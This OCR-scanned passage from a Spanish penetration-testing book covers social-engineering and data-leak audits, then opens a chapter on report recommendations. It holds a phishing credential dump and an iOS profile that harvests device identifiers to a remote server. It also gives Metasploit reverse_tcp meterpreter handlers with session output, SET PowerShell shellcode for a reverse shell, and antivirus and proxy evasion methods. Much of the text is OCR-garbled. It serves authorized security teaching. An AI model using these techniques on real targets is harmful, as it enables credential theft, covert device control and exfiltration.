ya  que  rrhh@lmanesventura.com.  es  el  dominio  valido  segiin  el  empleado.  Algunos  pueden 
pensar  que  es  una  "i”  mayuscula,  y  otros  pueden  detectai*  que  no  es  el  dominio.  La  mayona 
no  caera  en  esto. 
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-  Se  evaluara  si  el  empleado  accede  al  sitio  de esdecir  ..I  .  .  •  ■  , 

sido  crefble  y  ha  conseguido  que  la  historia  le  llevase  al  £io  web  ftL  ST 

podria  utilizar  exploits  para  los  navegadores  con  el  fin  de  tomar  el  control  de"h '  Ti 

empleado  y  demostrar  que  ha  caido  en  manos  del  equipo  de  auiitoT 

-  ^  Se  evaluara  si  el  empleado  accede  al  sitio  por  dispositivo  movil  e  instala  el  APK  o  el  pe.-fil 

dc  dispositivo  para  lOS  sin  verificar  que  realmente  pertenecen  a  la  empresa.  Si  el  empleado 

instala  esto,  se  podra  capturar  mfonnacion  del  dispositivo  movil  del  empleado  y  trasladirlo 
a  un  servidor  remoto.  ^  y  iidbiauano 

-  Se  evaluara  si  el  empleado  ha  introducido  credenciales  en  el  sitio  web  De  este  modo  se 
demuestra  que  el  empleado  se  ha  creido  toda  la  historia  y  que  ha  depositado  infonnacion 
sensible  en  manos  de  los  atacantes,  provocando  un  robo  y  la  posible  Riga  de  informacidn. 

^Como  representar  la  informacidn  que  se  ha  obtenido?  El  uso  de  imagenes  que  jtistifiqueii  lo  que  se 
ha  logrado  es  primordial,  y  tambien  el  uso  de  tablas  para  organizar  la  informacidn.  Por  ejemplo  en 
primer  liigar  seria  conveniente  indicar  datos  sobre  las  conexiones  que  ha  recibido  el  sitio  web  ta’lso 
se  podra  identificar  la  direccidn  TP  de  la  empresa  y  el  iiser-agetu  que  han  utilizado  en  la  naveuacidn' 
A  continuacion  se  presenta  una  tabla  que  ejemplifica  esto.* 


Fecha 

Li  ser- Agent 

Direccion 

IP 

2014-02-02  11:43:03 

M()ziUa/5.0  (XU:  UhwUu:  Linux  }6S6:  nKlI.O)  Gecko/20 1 00 1 0 1  Firefox/t  2.0  AppEn 

<1P> 

2014-02-02  11:43:45 

Moziiia/5.0  (XU:  Ohunfu:  Linux i6S6:  rv:l2.0)  Gecko/20100101  Firefbx/1 2.0  AppEn 

<1F^- 

2014-02-02  11:47:45 

Mozilla/5.0  (XU:  Uhuntu:  Linux  i686:  rv:l2.0)  Gecko/2010010!  Firefo.x/ 12.0  AppEn 

<1P> 

Tabla  3.06:  Conexiones  recibidas  desde  la  empresa  al  sitio  web  falso. 


Hay  que  proporcionar  numeros  sobre  las  visitas,  es  decir  datos  cuantificables,  y  si  se  detectaron 
visitas  desde  dispositivos  mdviles.  Despues  hay  que  indicar  el  numero  de  empleados  que  introduieron 
sus  credenciales  en  esta  trampa.  con  un  solo  empleado  que  introdujera  su  credencial  la  prtieba  seria 
e.xitosa  para  cl  equipo  de  auditoria.  En  situaciones  reales  estos  entomos  han  provocado  un  numero 
alto  de  usuarios  que  mtrodujeron  su  credencial,  por  lo  que  estas  estrategias  suelen  tener  un  ratio  de 
exito  alto.  Para  el  informe  es  importante,  y  muy  vistoso,  proporcionar  un  volcado  de  la  pequefia 
ba.se  de  datos  que  se  monta  con  el  sitio  web.  De  este  modo  se  demuestra  que  empleados  introdujeron 
SU  ctedencial  y  cayeron  totaimente  en  la  trampa. 


- 

pglez 

12-3abc. 

2014-02-02 

exist:  ir:a .  r  oda 

nu.carro  23 

2014-02-02 

luis  .mart: in 

rair.sjd34 

2014-02-02 

jose . rodrignez 

JcelQ23 . 

2014-02-02 

0 

j  ose .  rQdriguez@inianesvent.-ara 

lcelQ23 . 

2014-02-02 

6 

maxibel . codina 

amor  2  3 

2014-02-02 

jose .  rodrigpuez^liEanesventura 

k:elo23. 

2014-02-02 

- 

raarta. lopez 

Icanija24 

2014-02-02 

Fig.  3.84:  Volcado  dc  contrasena  obtenido  en  la  pmeba. 
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PoC:  Cebos  para  dispositivos  moviles 

En  esta  prueba  de  concepto  se  explica  como  gracias  a  lierramientas  que  los  fabricantes  de  sistemas 
operatives  moviles  como  Apple  o  Google  y  la  confianza  de  los  usuarios  en  que  las  cosas  son  lo 
que  parecen,  se  puede  conseguir  atacar  a  los  empleados  de  la  empresa  objetivo  a  traves  de  sus 
dispositivos  moviles. 

La  empresa  de  Cupertino^  Apple,  proporciona  a  desaiToll  adores,  departamentos  dtlT,  administradores 
de  sistemas  mecanismos  para  gestionar  una  gran  cantidad  de  dispositivos  iOS  a  nivel  coiporativo. 
Existen  tipos  de  pei*files,  como  son  los  perfiles  de  configuracion  y  perfiles  de  aprovisionamiento. 
Los  perfiles  de  aprovisionamiento  peniiiten  instalar  dates  o  aplicaciones  en  los  dispositivos.  For  el 
contrario  se  tienen  los  perfiles  de  configuracion,  con  los  que  se  puede  configurar  los  dispositivos 
para  cumplir  politicas  de  seguridad  corporativa. 

Los  perfiles  tambien  penniten  recopilar  dates  de  los  dispositivos  y  de  este  mode  los  administradores 
pueden  catalogar  de  manera  um'voca  los  diferentes  dispositivos  que  fonnan  parte  de  la  empresa.  El 
objetivo  en  esta  prueba  de  concepto  sera  crear  un  peifil  de  configuracion  que  pennita  recoger  dates 
importantes  de  los  dispositivos  como  es  el  VOID.  ICCID,  IMEI,  vei^sion  del  sistema  operative  iOS 
que  eJecLita  el  terminal,  producto,  etcetera.  ^Que  es  un  perfil?  ^Como  se  genera?  Simplemente  es 
un  archivo  con  extension  .mobileconfig.  que  a  su  vez  puede  ser  comparado  con  un  archive  Xh4L, 
como  los  ficheros  .plist  de  Apple.  Se  puede  crear  perfectamente  a  mano,  sin  llegar  a  utilizar  ningiina 
heiTamienta.  Toda  esta  informacion  puede  ser  consultada  en  la  documentacion  de  Apple. 


<?xml  vfrr5ionr'’'i.0"  encoding»»'’lJTF-8**?> 

<!00CTYPE  plist  PUBLIC  "-//Apple//DTD  PLIST  1.0//EN’'  •'http: //www.  apple.  cor/DTDs/PropertyLiSt-l. 0 . 

<pli5t  versiork=**l. D“> 

<dict> 

«key>PayloodContcnt</key> 

<dict> 

<key>URL</key> 

'<string>http:  ret  neve.  php</string> 

<key>OeviceAtt  ribute5</key> 

<array> 

-:st  ring>UDID</st  ring> 

<string>IHEI</st ring> 

<st rin9>ICCID</ St ring> 

<5t  ring>VERSI0N</5t  ring> 

<5tring>PR0I>UCT</st  ring> 

-:strirkg>DEVICE_NAME</st  ring> 

</array> 

•*'-/dict> 

<key>Pi>yloadOrganizatiorK/key> 

<s  t  ring 5 1  r  lng> 

<key>Pay loadDisplayNamc</key> 

<string>fl^^H^B  Profile  Servicc<r./string> 

<key>PayloadVer5ior»</key> 

<integer>l</inteQer> 

<key>PayloadLIUID</key> 

<string>21901a40-3a21-llc2-Blcl-0800200c9a66‘*:/string> 

^kcy>PayloadIdervtif  ier</key> 

rAn9.><?  A  ?.  t.  r.ir.a^ 

<key>Pay ioadbesc  ript ion</key>  _ 

<st  ring>Perf  11  para  cl  Concurso  dc  ring > 

<kcy>PayloadType</kcy> 

<string>Prof ile  Scrvicc</strinQ> 

</dict> 

</pli5t>  _  _  ^ 


Fig.  3.85:  Peifil  de  configuracion  para  recopilacion  de  datos. 
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El  pei-fil  es  anadido  al  sitio  web  anterior,  con  la  intencion  de  que  ciianHn  v.  i  , 

con  dispositivos  movil  y  sistema  operativo  iOS.  se  descargue  y  solicite  l-i  in.M 

usuario.  El  perfil  esta  personalizado  para  indicar  que  es  una  aplicacion  corpUafiw  T?'  i 

este  modo  no  despertar  excesivas  sospechas.  Una  vez  instalado  el  perfil  ^ste  envif  ’  i  " 

descrita  en  el  perfil  al  sei^idor  web  donde  se  recogeran  los  datos  en" 

procedimiento  es  utilizado,  en  algunas  ocasiones,  por  administradores  de  sistenn«s  v  h 

II.  por  lo  que  puede  ser  entendido  como  una  operacion  de  gestion  por  los  ustaTos  departamentos 


Fig.  3.86:  Instalacion  dc  perfil  en  dispo.siiivo  iOS. 

Con  esta  informacion  sepodna  realizarotrotipode  perfil  y  conseguirgenerarun  ipa  para  esc  dispositive 
e  inlentar  mstalarlo.  Esto  permitiria  introducir  aplicaciones  manipuladas  en  los  dispositivos  de  los 
usuarios,  aunque  el  grade  de  complejidad  en  esta  situacion  aumenta  considerablemente. 

En  la  prueba  de  concepto  de  Android  se  puede  pensar  el  siguiente  escenario; 

Se  genera  un  APK  que  imite  a  una  aplicacion  corporativa  de  la  empresa. 

-  Se  cuelga  del  sitio  web  false,  para  que  cuando  se  acceda  desde  un  terminal  con  este 
sistema  operativo  se  proceda  a  la  instalacion. 

Se  confia  en  que  la  victima  no  piense  demasiado  en  los  pennisos  del  manifiesto.  ya  que 
se  pedira  desde  acceso  a  la  cam,  a  los  contactos,  microfono,  etcetera.  Todo  lo  que  el  equipo 
de  auditores  piense  que  es  necesario. 
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-  Ademas,  la  aplicacion  realizara  peticiones  a  ciertos  servidores  donde  los  auditores 
dispondran  de  un  Metasploit,  el  ciial  mandara  una  shellcode  a  la  aplicacion.  Cuando  esta 
lo  reciba  lo  ejecutara  provocando  la  oblencion  de  una  shell  inversa,  entendiendose  por  shell 
inversa  cualquier  tipo  de  shellcode  que  el  dispositive  pueda  ejeciitar. 

“  La  aplicacion  es  bastante  facil  de  crear,  y  realmente  lo  complejo  del  proceso  es  conseguir 
que  el  usuario  decida  instalar  la  aplicacion.  Si  el  guion  de  toda  la  historia  que  se  ha  ido 
mostrando  a  lo  largo  de  las  pruebas  de  concepto  es  bueno,  este  tipo  de  pruebas  conseguiran 
un  efecto  positive  en  las  victimas,  y  se  podra  tener  el  control  de  los  dispositivos. 

A  continuacion  se  especifica  conio  montar  lo  necesario,  aunque  no  se  proporciona  el  codigo  de  la 
aplicacion  Android^  no  es  dificil  de  implementar.  La  aplicacion  de  Android  puede  aprovecharse 
e  intentar  obtener  contactos,  posicion  GPS,  registro  de  llamadas,  mensajes  de  texto,  etcetera.  Se 
hara  hincapie  mas  en  la  parte  de  la  shellcode,  ya  que  permitira  a  los  auditores  un  control  total 
sobre  el  dispositivo.  El  equipo  de  auditoria  configura  el  modulo  e:^ploit/nnilt i/handler  para  recibir 
conexiones  entrantes  y  el  payload  android/meterpreter/reverse Jcp , 


Successfully  loaded  plugin;  pro 
msf  >  use  exploit: /multi /handler 

rasf  exploit  (  -  )  >  set:  PAYLOAD  andrQid/ineterpreter/reverse_tcp 

PAYLOAD  =>  android/meterpreter/reverse_tcp 

msf  exploit (  _ )  >  set  LHCST  192. 16S. 1.17 

LHOST  =>  192.168.1.17 

msf  exploit (  .  i  )  >  exploit 

Started  reverse  handler  on  192.168.1.17:4144 
Starting  the  payload  handler... 

D _ 

Fig.  3.87:  Configuracion  de  miilti/hamiler. 

La  aplicacion  estara  configurada  para  realizar  una  peticion  a  la  direccion  IP  donde  se  encuentra  el 
modulo  handler  configurado.  Cuando  la  aplicacion  sea  descargada  e  instalada  realizara  la  peticion  y 
obtendra  una  shellcode,  en  este  instante  el  control  sera  tornado  por  el  equipo  de  auditoria. 

t\Que  se  puede  hacer?  Realmente  bastantes  cosas  ya  que  se  tiene  una  Meterpreter  ejecutandose  en  el 
dispositivo.  Debe  quedar  claro  que  lo  que  se  ejecuta  en  cl  dispositivo  es  una  Meterpreter  rediicida. 
similar  a  la  dt  java. 

Started  reverse  handler  on  192.168.1.17:4444 
Starting  the  payload  handler. , . 

Sending  stage  (39698  bytes)  to  192.168.1.10 

Meterpreter  session  1  opened  (192.168.1.17:4444  ->  192.168.1.10:49223)  at  20 
14-02-03  22:03:15  +0100 

meterpreter  >  | _ - 


Fig.  3.88:  Toma  de  control  con  shellcode  remota  en  Android. 
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El  equipo  de  auditoria  dispone,  por  ejemplo,  de  las  siguienles  acciones: 

-  c™  dispositivo  .coeso  sl.Ate,*,  complete.  si„„  esttl  ,„„w„  occeso  p.tci.l, 

Acceso  ai  miciotono  y  camara.  Siempre  y  cuando  los  permisos  del  nu.nif  ,  i  •  i 
aceptados  por  el  usuario.  ^  niamjest  hayan  sido 

Posibilidad  de  realizar  pivoting  a  otros  dispositivos.  e  incluso  redes  si  nv  ioto  i.- 

interna  en  el  dispositivo.  >edes  si  existe  una  zona  v.  /A 

-  Posibilidad  de  realizar  port  forwarding. 

-  Utilizacion  de  una  shell  remota. 

-  Descarga  y  subida  de  archives  al  dispositivo. 


Fig.  3.89:  Utilizacion  de  camara  en  dispositivo  Android  ^'cazar'^  al  autor 


Reciierda  que  para  este  tipo  de  priieba  la  imaginacion  maliciosa  debe  volar  y  cl  minimo  detalle 
puede  otorgar  cl  exito  de  la  operacion. 


S.Fuga  de  informacion 

Este  tipo  de  prueba  que  se  puede  realizar  como  anexo  en  un  proceso  de  Ethical  Hacking  permitc 
que  pide  el  servicio  conocer  el  estado  inlerno  de  .seguridad  ante  posibles  fiigas  de 
nacion  sensibles.  Existen  organizaciones  para  las  que  una  fuga  sobre  datos  economicos. 
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personales,  clientes,  etcetera,  piiede  suponer  un  impacto  negative  en  la  operativa  de  negocio.  Por 
esta  razon  requieren  conocer  si  es  viable  sacar  informacion  de  la  empresa  y  el  grade  de  dificultad. 

Este  tipe  de  prtiebas  se  suelen  hacer  desde  dentre  de  la  organizacion  que  las  selicita,  tomande  de 
nuevo  el  rol  de  un  empleado  sin  privilegios  que  puede  ser  comprado  por  la  competencia  del  sector. 
Ademas,  el  auditor  recibe  un  equipo  del  dominio  de  la  empresa,  por  lo  que  podra  intentar  escalar 
privilegios  en  dicho  equipo.  Mucha  gente  ve  esta  prueba  como  algo  sencillo  o  sin  coste  alguno,  pero 
cuando  una  empresa  la  solicita  es  porque  implementan  controles  para  evitar  este  tipo  de  fiigas.  Hay 
que  tomar  esta  prueba  con  el  grado  de  profesionalidad  que  merece. 

A  continuacion  se  expondran  controles  que  puede  implementar  una  empresa,  y  se  puede  entender 
que  en  algunas  ocasiones  extraer  infonnacion  de  una  organizacion  puede  ser  algo  bastante  complejo. 

^A  que  se  puede  enfrentar  un  auditor?  Esta  pregunta  tiene  una  respuesta  ilustrativa,  como  se  puede 
ver  a  continuacion: 

-  Los  equipos  de  los  empleados  no  tienen  unidad  de  CDIDVD,  ni  disquetera  y  los  puertos 
USB  deshabilitados.  Ademas,  los  equipos  se  encuentran  con  un  candado  para  que  no  se 
puedan  abrir,  ni  manipular.  No  se  puede  conectar  ningun  dispositive  externo  al  equipo. 

-  Las  comunicaciones  de  los  empleados  pasan  por  un  proxy  antes  de  salir  a  Internet. 

-  El  servidor  de  coitco  electronico  de  la  organizacion  registra  los  envios  salientes  de  los 
empleados.  Si  el  empleado  mandase  algo  cifrado,  el  servidor  notificaria  al  administrador  y 
bloquearia  el  envio  del  correo  hasta  que  el  administrador  lo  aprobase. 

-  El  navegador  tiene  un  plugin  el  cual  no  permite  que  se  adjunten  archives  en  los  servicios 
de  webmaiE  como  puede  ser  Gmail,  Hotmail,  Yahoo,  etcetera. 

Los  sitios  de  almacenamiento  en  cloud,  como  Drophox,  se  encuentran  bloqueados  por  el 
proxy. 

-  El  empleado  no  tiene  derechos  administrativos.  Incluso,  en  sistemas  Windows  el  UAC  le 
rechazara  el  intento  de  elevacion  de  privilegios. 

El  intento  de  conexion  a  semdores  FTP  sera  rechazada. 

Y  cualquier  cosa  de  proteccion  que  se  pueda  imaginar,  se  puede  encontrar  en  un  entomo  corporative 
con  controles  contra  la  fuga  de  informacion.  Por  estas  razones,  y  mas,  es  entendible  que  en  algunos 
entornos  puede  ser  realmente  diticil  el  provocar  una  fuga. 


Pruebas 

La  evaluacion  de  fliga  de  infonnacion  del  interior  de  una  organizacion  viene  determinada  por  un 
conjunto  de  pruebas.  Hay  pruebas  que  seran  comunes  siempre  y  otras  que  dependeran  del  ambito  o 
algun  aspecto  concreto  de  la  organizacion. 

A  continuacion  se  listan  algunas  pmebas  que  pueden  ser  realizadas  para  evaluar  la  posible  fuga  de 
informacion: 
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-  Esdada  da  privilegios  e„  el  equipo,  Se  puede  imenurr  uliliear  los  .illimos  e.rp/o/,.,  para 
onseguii  permisos  administtativos  o  system.  Puede  ser  altamente  interesante  conseauir 

pnvdegios  para  poder  modificar  algunas  acciones  o  configuraciones  que  la  maquina  teinm 
por  deiecto.  ' 

-  Evasion  prosy.  Estudiar  y  evaluar  el  comportamiento  del  pro.xv,  ya  que  este  puede  tener 
una  sene  de  reglas  para  restringir  ciertas  acciones,  por  ejempio,  en  flincion  de  la  cabecera 
del  fichero.  Este  ejercicio  puede  llevar  un  gran  niimero  de  pruebas,  ya  que  los  filtros  pueden 
ir  por  extension,  por  cabecera,  por  tamano  de  archives,  por  ubicacion,  protocolo,  etcetera. 

-  Infeccion  de  la  maquina  con  malware  o  sheUcodes  no  detectables  para  intentar  realizar 
la  SLibida  de  documentos.  Esta  pmeba  puede  ser  interesante  realizarla  junto  al  acceso  a  otra 
maquina  de  la  organizacion  con  el  fin  de  usarla  de  pivote  para  que  quede  registrada  como 
maquina  que  saca  la  informacion  hacia  el  exterior. 

-  Otras  pruebas.  Se  pueden  btiscar  tecnicas  esteganograficas  para  ocultar  informacion  o 
arcliivos  en  otros  y  poder  subirlos  a  algun  servidor  extemo  que  posea  el  auditor.  Realmente. 
la  imaginacion  del  auditor  sera  importante  en  este  caso,  ya  que  puede  no  ser  facil  encontrar 
una  via. 

PoC:  Powershell  y  obtencion  de  sesion  remota 

En  este  escenario  sc  ejemplifica  que  el  equipo  del  auditor  es  un  sistema  Micro.soft  Windows  Vista  o 
mas  moderno,  el  cual  dispone  de  una  PowerSheli. 

Existe  la  posibilidad  de  dcscargarse  de  Internet,  o  generar  con  SET.  Social  Engineering  Toolkit,  una 
sheHcode  qtie  se  carga  desde  codigo  en  PowerSheli.  Es  una  opcion  realmente  interesante.  y  que  a  dla 
de  hoy  no  genera  mticho  ruido  en  ettanto  a  deteccion  de  antivirus  sc  refiere. 

El  auditor  preparara  el  codigo  antes  de  ir  a  sti  jomada  laboral  a  la  empre.sa  que  se  esta  auditando. 
El  auditor  geneia  el  script  encodeado  y  lo  ejecutara  en  la  maquina  de  la  organizacion.  i.PowetShell 
permite  ejecucion  de  scripts'! 

La  respuesta  es  que  sii  politica  por  defecto  es  restricted,  por  lo  que  no  se  puede,  pero  simplemente 
se  debe  copiar  y  pegar  en  la  pantalla  de  PowerSheli  el  contenido  del  script,  como  si  cl  auditor  lo 
escribicra  a  mano  y  ya  se  ejecuta. 

Tras  ejecutar  el  contenido  del  script  se  realizara  una  conexion  hacia  el  exterior,  a  la  direccion  IP  que 
el  auditor  haya  configurado  en  SET.  Antes  de  explicar  esto  a  Ibndo,  se  profundiza  en  la  generacion 
del  script  con  SET. 

En  primer  lugar.  y  tras  arrancar^TTr  se  elegira  el  vector  de  ataque  At  PowerSheli.  Despucs  se  titilizara 
la  opcion  ntimero  uno  de  este  vector  de  ataque  denominada  '"PowerSheli  Alphanumeric  Shellcode 
Injector".  Aqul  existen  dos  opciones.  generarla  para  sistemas  de  32  o  64  bits. 

Al  finalizai  este  proceso  se  crea  tin  archivo  TXT  en  la  ruta  /pentest/exploits/set/reports,  si  se  ejecuta 
en  una  BackTrack. 
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1)  Powershell  Alphanumeric  Shellcode  Injector 

2)  Powershell  Reverse  Shell 

3)  Powershell  Bind  Shell  ^ 

4)  Pov/ershell  Dump  SAM  Database 

99)  Return  to  Main  Menu 

set: powers hell>l 

set>  IP  address  for  the  payload  listener:  192.168.1.38 

Prepping  the  payload  for  delivery  and  injecting  alphanumeric  shellcode... 
Enter  the  port  number  for  the  reverse  [443]:  4444 
Generating  x64-based  powershell  injection  code... 

Generating  x86-based  powershell  injection  code... 

Finished  generating  powershell  injection  attack  and  is  encoded  to  bypass  exe 
cution  restriction... 

set>  Do  you  want  to  start  the  listener  now  [yes/no]:  :  yes 

set:po’v;rrnnell>  Select  x86  or  x64  victim  machine  [default:  x64] : _ 

Fig.  3.90:  Generacion  del  scvipi  para  inyeccion  de  shellcode  remota. 


Se  clebe  configurar  el  handler  eii  Metasploit  para  recibir  la  scsion  una  vez  se  ejecutc  cl  contenido  del 
script.  Hay  que  tener  en  cuenta  que  en  la  gencracion  del  script  sc  debe  contar  con  el  proxy.  Una  vez 
el  handler  rccibe  la  primera  peticion  desde  dentro  de  la  organizacion,  csle  envia  la  shellcode  que  se 
ejecLitara  en  cl  equipo  donde  se  encuentra  el  auditor. 

Esta  operativa  tambien  puede  servir  para  intentar  una  escalada  de  privilegios,  una  vcz  que  se  tienc 
una  sesion. 

msf  exploitfhandler)  > 

1  .  Started  reverse  handler  on  0.0.0,0:4444 

Starting  the  payload  handler... 

Sending  stage  (951296  bytes)  to  192.168.1.37 

Heterpreter  session  1  opened  (192.168.1.38:4444  ->  192.168.1.37:49299)  at  2012-09-22  15:09:5 

2  -0400 

msf  exploitChandler)  >  sessions  -i 
Active  sessions 


Id  Type  Information  Connection 

1  meterpreter  x64/v/in64  pablo-vm\pablo  @  PABLO-VH  192.168.1.38:4444  ->  192.168.1.37:49299 

(192.168.1.37) 

msf  exploit(handler)  >  _ 

Fig.  3.91 :  Controlando  iin  equipo  tras  la  ejecucion  de  un  .scripf  dc  Po^verShcdh 

^,C6mo  se  ejeciita  en  la  PowerShelP.  Como  se  ha  comentado  antcriormente,  simpleinente  pegando 
cl  contenido  del  script  y  ejecutando.  Se  podria  intentar  mediante  el  comando  download  sacar  el 
contenido  que  represenla  la  informacion  sensible  en  esta  prueba  a  traves  de  eslc  canal  que  se  ha 
creado  desde  fiiera  de  la  organizacion  hacia  dentro. 
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l^indows  Pov/erSI>cll 

Copyright  <C>  2009  Microsoft  Corporation.  Rescroados  todos  los  dercchos. 

fcnHcfiUijnnflHnft9:oo..orflaaftn>ar...«.i?A_..«.....^Jpp"™"Jg;;JG8fly^ftofl]^fihg|0fl|WAdflByACflflbABwflEEAZftBkflHIAZQB2ftHMflLftflgflHUfla^^ 


Fig.  3.92:  Meterpreter  encodeada  en  la  PowerShelL 


PoC:  Shellcodes  no  detectables 

La  via  anterior  es  una  manera  interesante  de  intentar  una  fliga  de  infomiacion.  pero  existen  otras 
que  tambien  pueden  ser  interesantes,  y  que  en  un  alto  porcentaje  de  ocasiones  van  a  flmcionar  En 
la  Rooted  CON  de  2013,  yo  (Pablo  Gonzalez)  y  Juan  Antonio  Calles,  presentamos  una  via  de  evadir 
antivirus  e  IDS,  Intrusion  Detection  System,  que  consistia  en  un  EXE  que  hacia  de  loader  y  que 
obtema  una  DLL  en  remoto  y  la  cargaba.  La  charla  en  la  confereneia  se  denominaba  -Metasploit  & 
Hii-AD:  Avoiding  AVs  with  Payloads/DLLs  Injection  La  DLL  albergaba  cualquier  shellcode  que 

pudiera  ser  ejccutada  en  la  arquiteclura  ddiide  el  loader  se  encontrase,  y  cambiaba  en  cada  nueva 
generacion. 

La  tecnica  cvoluciond  y  el  traspaso  de  la  shellcode  desde  el  exterior  hasta  el  loader  se  hacia 
direclamente  a  memoria.  Ademas,  la  shellcode  podria  ir  descolocada  a  modo  de  trilero  para  evitar 
que  algunos  IDS  reconocieran  patrones.  AI  llegar  a  memoria  se  podria  reorganizar  para  poder 
ejecutarse  correctamente.  Incluso  se  ha  realizado  algun  modulo  en  Metasploit  para  implemenlar 
esto  y  poder  llevaiio  a  cabo  de  manera  sencilla. 

Tanto  la  generacion  de  la  DLL  como  el  ejecutable  que  hace  de  servidor  para  otorgar  la  shellcode  en 
remoto  requieren  conocimientos  de  programacion  para  poder  emular  esta  tecnica. 

El  auditor  puede  utilizar  o  emular  esta  tecnica  para  evadir  los  antivirus  e  IDS  que  pueda  haber  cn  la 
organizacion.  Se  ejemplificara  el  siguiente  entomo: 

El  proxy  de  la  organizacion  analiza  las  cabeceras  de  los  archivos  buscando  extensiones. 

-  Si  se  encuentra  un  ZIP  se  comprueba  contenido,  si  hay  EXE  se  descarta. 

Si  los  aichivos  son  DOC o  PDE dentro  del  ZIP  se  permiten. 

-  Si  la  extension  era  RAR  el  proxy  permitia  dejar  descargarse  el  fichero,  independientemente 
del  contenido. 

El  auditor  podra  introducir  el  loader  y  la  DLL  necesaria  comprimidos  en  un  RAR.  En  la  imaaen 
se  puede  visualizar  que  contiene  el  comprimido,  un  EXE  y  dos  DLLs.  La  DLL  con  nombre 

d  J  "  ‘1“^  contiene  la  shellcode,  la  cual  y  como  se  comentd  antcriormente  es 

aistmta  en  cada  generacion  de  DLL.  La  no  evaluacion  del  RAR  por  parte  del  proxv  parece  un  fallo  de 
onnguiacion  en  la  organizacion,  por  lo  que  deberia  ser  anotado  para  el  infonne. 
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1  g  !l  B  11^ 

«  Datd^O:)  »  Users  >  DoiVf^lceds  ► 

Organi:e  ▼  Include  in  libraiy  »  Share  with  ▼  Ne.v  folder 

P' 

r=  ^  53  g 

Favorites 

I-iamc 

Cate  modified 

Type 

n  Deshop 

L3.  .e^ie 

0  ‘3 

•  3 

4^  Dc.vnicads 

libgcc.s.d .vZ-l.dll 

-pp'lC.’tfcr  \ 

ii:  •  £: 

Recent  Places 

■4  pruebalibreria.dll 

0  V 

•‘•l-pil-ia'icr  e.’:tnT 

Fig.  3.93:  Conlcnido  del  RAR  '"colacfo'^  en  la  organizacion. 


Ahora,  alguien  del  equipo  de  auditoria  fiiera  de  la  empresa  auditada  deberia  configurar  el  handler  de 
Metasploit  para  recibir  una  pelicion,  por  ejemplo,  de  una  Meterpreler.  Con  esto  se  habra  conseguido 
un  nuevo  canal  de  manera  transparente  a  la  empresa.  y  se  podra  ulilizar  dicho  canal  para  poder  subir 
y  descargar  archives.  Hay  qiie  tener  en  cuenta  la  configuracion  del  proxy  en  la  generacion  de  la 
shellcode,  Tambien  recordar  que  esta  tecnica  es  una  via  para  un  intento  de  escalada  de  privilegios 
en  la  organizacion. 


PoC:  Evasiones  de  proxy  con  paciencia  y  pruebas 

En  esta  prueba  de  concepto  se  hablara  de  como  evadir  el  proxy  mediante  la  realizacion  de  distintas 
pruebas.  En  algunas  ocasiones  se  debe  realizar  pruebas  sencillas  que  permitan  verificar  la  con'ecta 
configuracion  del  proxy,  ya  que  nunca  se  sabe  donde  puede  haber  sorpresas  respecto  a  los  en*ores  de 
configuracion  en  un  dispositive  o  servicio. 

Hay  que  verificar  el  software  que  se  encuentra  en  la  maquina  del  auditor,  y  poder  verificar  que  ese 
tipo  de  extensiones  se  puede  descargar.  Se  debera  probar  tanto  la  subida  como  descarga  de  archives, 
y  estudiar  el  compoitamiento  del  proxy,  Aunque  parezea  extrano,  el  lamano  de  un  fichero  puede 
hacer  que  el  proxy  lo  deje  pasar  o  no,  esle  lipo  de  circunstancias  son  las  que,  con  paciencia,  se  deben 
ir  probando  y  chequeando. 

Si  en  el  equipo  del  auditor  se  encuentra  software  de  compresion,  se  debera  estudiar  la  viabilidad  de 
descarga  de  ese  tipo  de  extensiones.  La  idea  de  realizar  un  bypass  es  conseguir  ’'colar”  un  archive 
en  la  organizacion,  y  sobretodo  conseguir  "sacar"  un  archivo  hacia  fuera  de  la  organizacion. 

Se  SLipone  un  ejemplo  en  el  que  el  auditor  encuentra  software  como  7zip  en  el  equipo.  por  lo  que  se 
entiende  que  se  podra  obtener  este  tipo  de  archivos  desde  Internet.  Es  posible  que  el  proxy  evaliie 
el  contenido  del  fichero,  pero  ^y  si  no?  Siempre  hay  que  probar  todo,  aunque  parezea  obvio  cl 
resLiltado  final. 

Ahora  se  explica  el  intento  de  subida  de  archivos  en  esta  pequena  prueba  de  concepto.  A1  realizar 
el  intento  de  subida  de  archivos  es  necesario  hacer  frente  a  dos  impedimentos.  El  primero  puede 
ser  el  limite  maximo  del  tamaiio  del  archivo,  y  el  segundo,  evadir  la  comprobacion  de  los  archivos 
SLibidos. 


una  opcion  interesante  es  codificar  ei  archivo  comprimido  en  7^in  .  . 

Base64.  Este  archivo  puede  tener  un  tamano  considerable  para  simuhar  un^ft"  !  ' 

posttriormenie  publicarlo  codificado  an  „n.  pdgipa  web  dedie.da  a  la  pi  bliclddt ^ 

anopimo,,  Esla  estralegia  puede  ser  may  efieiente  en  gran  eanridad  de  LadZTj"  docameiaos 

pruebas,  "  rtiaciones  para  e.sie  lipo  de 

Hay  que  recordar  la  etica  protesional  del  auditor,  por  lo  que  el  fichero  que  se  suhe  nn  H.h. 
importanle  o  sensible  bajo  ningun  concepto.  '  ^ 
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Capitulo  IV 

Recomendaciones  del  proceso 


l.Las  recomendaciones 

Una  vez  llevado  a  cabo  la  auditon'a  se  debe  realizar  un  informe  con  todo  lo  que  se  ha  encontrado  cn 
el  proceso.  lh 

Las  recomendaciones  son  algo  que  deben  estar  en  todo  informe  que  se  presente  a  un  cliente  ya  que 
como  expertosen  la  tematica  de  seguridad  se  deben  proporcionar  las  premisas  para  cviiar  que  los 
tallos  de  seguridad  encontrados  supongan  alguna  perdida  o  dano  de  active  a  la  empresa  contratante. 

En  funcion  dc  la  auditon'a  que  se  este  llevando  a  cabo,  las  recomendaciones  siempre  cambiaran 

aunque  algunas  de  ellas  se  pueden  extrapolar  a  otros  ambitos,  por  lo  que  se  pueden  enunciar  en 
arnbas  auditonas. 

Existen  las  reeomendaeiones  parciales,  las  cuales  proporcionan  una  respuesta  ante  un  fallo  de 
seguridad  que  se  ha  deteetado  en  una  auditoria,  y  por  otro  lado  esta  la  recomendacion  generica  o 
casi  generiea,  que  proporciona  las  buenas  practieas  ante  un  riesgo  conocido. 

En  este  capitulo  se  estudiaran  distintas  recomendaciones  que  se  pueden  llevara  eabo  en  las  distintas 
auditonas,  con  las  que  se  le  dara  un  toque  diferenciador  y  de  categon'a  al  informe  final. 

Tambien  hay  que  pensar  que  el  auditor  es  una  persona  que  conoce  la  seguridad  y  que  trabaja  con 

e  a,  es  dear,  es  un  profesional  del  seetor,  y  debe  conocer  las  formas  de  proteger  o  recomendar  a 
otros  usuanos  o  empresas. 

